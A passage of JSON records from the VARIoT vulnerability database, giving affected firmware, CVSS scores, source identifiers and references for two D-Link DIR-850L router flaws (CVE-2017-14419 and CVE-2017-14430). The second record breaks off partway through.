Vulnerability from variot - Updated: 2023-12-18 13:52The D-Link NPAPI extension, as used on D-Link DIR-850L REV. A (with firmware through FW114WWb07_h2ab_beta1) and REV. B (with firmware through FW208WWb02) devices, participates in mydlink Cloud Services by establishing a TCP relay service for HTTP, even though a TCP relay service for HTTPS is also established. D-Link DIR-850L There is a certificate validation vulnerability in the device firmware.Information may be obtained. The D-LinkDIR-850L is a wireless router from D-Link. A security vulnerability exists in NPAPIextension in FW114WWb07_h2ab_beta1 and previous versions of D-LinkDIR-850L. A remote attacker can exploit this vulnerability to obtain information
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201709-0590",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "dir-850l",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "fw114wwb07_h2ab"
},
{
"model": "dir-850l",
"scope": "lt",
"trust": 1.0,
"vendor": "dlink",
"version": "fw114wwb07_h2ab"
},
{
"model": "dir-850l",
"scope": "lte",
"trust": 1.0,
"vendor": "dlink",
"version": "fw208wwb02"
},
{
"model": "dir-850l",
"scope": "lte",
"trust": 0.8,
"vendor": "d link",
"version": "fw114wwb07_h2ab_beta1"
},
{
"model": "dir-850l",
"scope": "lte",
"trust": 0.8,
"vendor": "d link",
"version": "fw208wwb02"
},
{
"model": "dir-850l \u003c=fw114wwb07 h2ab beta1",
"scope": null,
"trust": 0.6,
"vendor": "d link",
"version": null
},
{
"model": "dir-850l",
"scope": "eq",
"trust": 0.6,
"vendor": "d link",
"version": "fw114wwb07_h2ab"
},
{
"model": "dir-850l",
"scope": "eq",
"trust": 0.6,
"vendor": "d link",
"version": "fw208wwb02"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-31790"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-008138"
},
{
"db": "NVD",
"id": "CVE-2017-14419"
},
{
"db": "CNNVD",
"id": "CNNVD-201709-576"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dlink:dir-850l_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "fw114wwb07_h2ab",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:dlink:dir-850l_firmware:fw114wwb07_h2ab:beta1:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dlink:dir-850l:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dlink:dir-850l_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "fw208wwb02",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dlink:dir-850l:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2017-14419"
}
]
},
"cve": "CVE-2017-14419",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"integrityImpact": "NONE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Medium",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 4.3,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "CVE-2017-14419",
"impactScore": null,
"integrityImpact": "None",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.6,
"id": "CNVD-2017-31790",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.6,
"id": "VHN-105139",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:M/AU:N/C:P/I:N/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 5.9,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.2,
"impactScore": 3.6,
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
{
"attackComplexity": "High",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 5.9,
"baseSeverity": "Medium",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2017-14419",
"impactScore": null,
"integrityImpact": "None",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2017-14419",
"trust": 1.8,
"value": "MEDIUM"
},
{
"author": "CNVD",
"id": "CNVD-2017-31790",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201709-576",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "VULHUB",
"id": "VHN-105139",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-31790"
},
{
"db": "VULHUB",
"id": "VHN-105139"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-008138"
},
{
"db": "NVD",
"id": "CVE-2017-14419"
},
{
"db": "CNNVD",
"id": "CNNVD-201709-576"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The D-Link NPAPI extension, as used on D-Link DIR-850L REV. A (with firmware through FW114WWb07_h2ab_beta1) and REV. B (with firmware through FW208WWb02) devices, participates in mydlink Cloud Services by establishing a TCP relay service for HTTP, even though a TCP relay service for HTTPS is also established. D-Link DIR-850L There is a certificate validation vulnerability in the device firmware.Information may be obtained. The D-LinkDIR-850L is a wireless router from D-Link. A security vulnerability exists in NPAPIextension in FW114WWb07_h2ab_beta1 and previous versions of D-LinkDIR-850L. A remote attacker can exploit this vulnerability to obtain information",
"sources": [
{
"db": "NVD",
"id": "CVE-2017-14419"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-008138"
},
{
"db": "CNVD",
"id": "CNVD-2017-31790"
},
{
"db": "VULHUB",
"id": "VHN-105139"
}
],
"trust": 2.25
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2017-14419",
"trust": 3.1
},
{
"db": "JVNDB",
"id": "JVNDB-2017-008138",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201709-576",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2017-31790",
"trust": 0.6
},
{
"db": "VULHUB",
"id": "VHN-105139",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-31790"
},
{
"db": "VULHUB",
"id": "VHN-105139"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-008138"
},
{
"db": "NVD",
"id": "CVE-2017-14419"
},
{
"db": "CNNVD",
"id": "CNNVD-201709-576"
}
]
},
"id": "VAR-201709-0590",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-31790"
},
{
"db": "VULHUB",
"id": "VHN-105139"
}
],
"trust": 1.7
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"IoT",
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-31790"
}
]
},
"last_update_date": "2023-12-18T13:52:54.461000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "DIR-850L",
"trust": 0.8,
"url": "http://support.dlink.com/productinfo.aspx?m=dir-850l"
},
{
"title": "D-Link DIR-850L Security vulnerabilities",
"trust": 0.6,
"url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=235003"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-008138"
},
{
"db": "CNNVD",
"id": "CNNVD-201709-576"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-295",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-105139"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-008138"
},
{
"db": "NVD",
"id": "CVE-2017-14419"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.5,
"url": "https://pierrekim.github.io/blog/2017-09-08-dlink-850l-mydlink-cloud-0days-vulnerabilities.html"
},
{
"trust": 1.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2017-14419"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-14419"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-31790"
},
{
"db": "VULHUB",
"id": "VHN-105139"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-008138"
},
{
"db": "NVD",
"id": "CVE-2017-14419"
},
{
"db": "CNNVD",
"id": "CNNVD-201709-576"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2017-31790"
},
{
"db": "VULHUB",
"id": "VHN-105139"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-008138"
},
{
"db": "NVD",
"id": "CVE-2017-14419"
},
{
"db": "CNNVD",
"id": "CNNVD-201709-576"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-10-27T00:00:00",
"db": "CNVD",
"id": "CNVD-2017-31790"
},
{
"date": "2017-09-13T00:00:00",
"db": "VULHUB",
"id": "VHN-105139"
},
{
"date": "2017-10-10T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-008138"
},
{
"date": "2017-09-13T17:29:00.447000",
"db": "NVD",
"id": "CVE-2017-14419"
},
{
"date": "2017-09-28T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201709-576"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-10-27T00:00:00",
"db": "CNVD",
"id": "CNVD-2017-31790"
},
{
"date": "2017-09-21T00:00:00",
"db": "VULHUB",
"id": "VHN-105139"
},
{
"date": "2017-10-10T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-008138"
},
{
"date": "2023-11-17T20:01:16.417000",
"db": "NVD",
"id": "CVE-2017-14419"
},
{
"date": "2023-04-27T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201709-576"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201709-576"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "D-Link DIR-850L Vulnerability related to certificate validation in device firmware",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-008138"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "trust management problem",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201709-576"
}
],
"trust": 0.6
}
}
VAR-201709-0601
Vulnerability from variot - Updated: 2023-12-18 13:48D-Link DIR-850L REV. A (with firmware through FW114WWb07_h2ab_beta1) and REV. B (with firmware through FW208WWb02) devices allow remote attackers to cause a denial of service (daemon crash) via crafted LAN traffic. D-Link DIR-850L There is an input validation vulnerability in the device firmware.Service operation interruption (DoS) There is a possibility of being put into a state. D-LinkDIR-850LREV.A and REV.B are both D-Link wireless router products. There are security vulnerabilities in the REV.B devices of the D-LinkDIR-850LREV.A and FW208WWb02 and previous versions of firmware using FW114WWb07_h2ab_beta1 and previous firmware
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201709-0601",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "dir-850l",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "fw114wwb07_h2ab"
},
{
"model": "dir-850l",
"scope": "lt",
"trust": 1.0,
"vendor": "dlink",
"version": "fw114wwb07_h2ab"
},
{
"model": "dir-850l",
"scope": "lte",
"trust": 1.0,
"vendor": "dlink",
"version": "fw208wwb02"
},
{
"model": "dir-850l",
"scope": "lte",
"trust": 0.8,
"vendor": "d link",
"version": "fw114wwb07_h2ab_beta1"
},
{
"model": "dir-850l",
"scope": "lte",
"trust": 0.8,
"vendor": "d link",
"version": "fw208wwb02"
},
{
"model": "dir-850l rev.a \u003c=fw114wwb07 h2ab beta1",
"scope": null,
"trust": 0.6,
"vendor": "d link",
"version": null
},
{
"model": "rev.b \u003c=fw208wwb02",
"scope": null,
"trust": 0.6,
"vendor": "d link",
"version": null
},
{
"model": "dir-850l",
"scope": "eq",
"trust": 0.6,
"vendor": "d link",
"version": "fw114wwb07_h2ab"
},
{
"model": "dir-850l",
"scope": "eq",
"trust": 0.6,
"vendor": "d link",
"version": "fw208wwb02"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-33063"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-008104"
},
{
"db": "NVD",
"id": "CVE-2017-14430"
},
{
"db": "CNNVD",
"id": "CNNVD-201709-565"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dlink:dir-850l_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "fw114wwb07_h2ab",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:dlink:dir-850l_firmware:fw114wwb07_h2ab:beta1:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dlink:dir-850l:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dlink:dir-850l_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "fw208wwb02",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dlink:dir-850l:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2017-14430"
}
]
},
"cve": "CVE-2017-14430",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "PARTIAL",
"baseScore": 5.0,
"confidentialityImpact": "NONE",
"exploitabilityScore": 10.0,
"impactScore": 2.9,
"integrityImpact": "NONE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Partial",
"baseScore": 5.0,
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "CVE-2017-14430",
"impactScore": null,
"integrityImpact": "None",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "PARTIAL",
"baseScore": 5.0,
"confidentialityImpact": "NONE",
"exploitabilityScore": 10.0,
"id": "CNVD-2017-33063",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "PARTIAL",
"baseScore": 5.0,
"confidentialityImpact": "NONE",
"exploitabilityScore": 10.0,
"id": "VHN-105152",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:N/I:N/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 7.5,
"baseSeverity": "High",
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "CVE-2017-14430",
"impactScore": null,
"integrityImpact": "None",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2017-14430",
"trust": 1.8,
"value": "HIGH"
},
{
"author": "CNVD",
"id": "CNVD-2017-33063",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201709-565",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULHUB",
"id": "VHN-105152",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-33063"
},
{
"db": "VULHUB",
"id": "VHN-105152"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-008104"
},
{
"db": "NVD",
"id": "CVE-2017-14430"
},
{
"db": "CNNVD",
"id": "CNNVD-201709-565"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "D-Link DIR-850L REV. A (with firmware through FW114WWb07_h2ab_beta1) and REV. B (with firmware through FW208WWb02) devices allow remote attackers to cause a denial of service (daemon crash) via crafted LAN traffic. D-Link DIR-850L There is an input validation vulnerability in the device firmware.Service operation interruption (DoS) There is a possibility of being put into a state. D-LinkDIR-850LREV.A and REV.B are both D-Link wireless router products. There are security vulnerabilities in the REV.B devices of the D-LinkDIR-850LREV.A and FW208WWb02 and previous versions of firmware using FW114WWb07_h2ab_beta1 and previous firmware",
"sources": [
{
"db": "NVD",
"id": "CVE-2017-14430"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-008104"
},
{
"db": "CNVD",
"id": "CNVD-2017-33063"
},
{
"db": "VULHUB",
"id": "VHN-105152"
}
],
"trust": 2.25
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2017-14430",
"trust": 3.1
},
{
"db": "JVNDB",
"id": "JVNDB-2017-008104",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201709-565",
"trust": 0.7
},
{
"db": "EXPLOITALERT",
"id": "27497",
"trust": 0.6
},
{
"db": "CNVD",
"id": "CNVD-2017-33063",
"trust": 0.6
},
{
"db": "VULHUB",
"id": "VHN-105152",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-33063"
},
{
"db": "VULHUB",
"id": "VHN-105152"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-008104"
},
{
"db": "NVD",
"id": "CVE-2017-14430"
},
{
"db": "CNNVD",
"id": "CNNVD-201709-565"
}
]
},
"id": "VAR-201709-0601",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-33063"
},
{
"db": "VULHUB",
"id": "VHN-105152"
}
],
"trust": 1.7
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"IoT",
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-33063"
}
]
},
"last_update_date": "2023-12-18T13:48:30.016000Z",
"patch": {
"@context": {
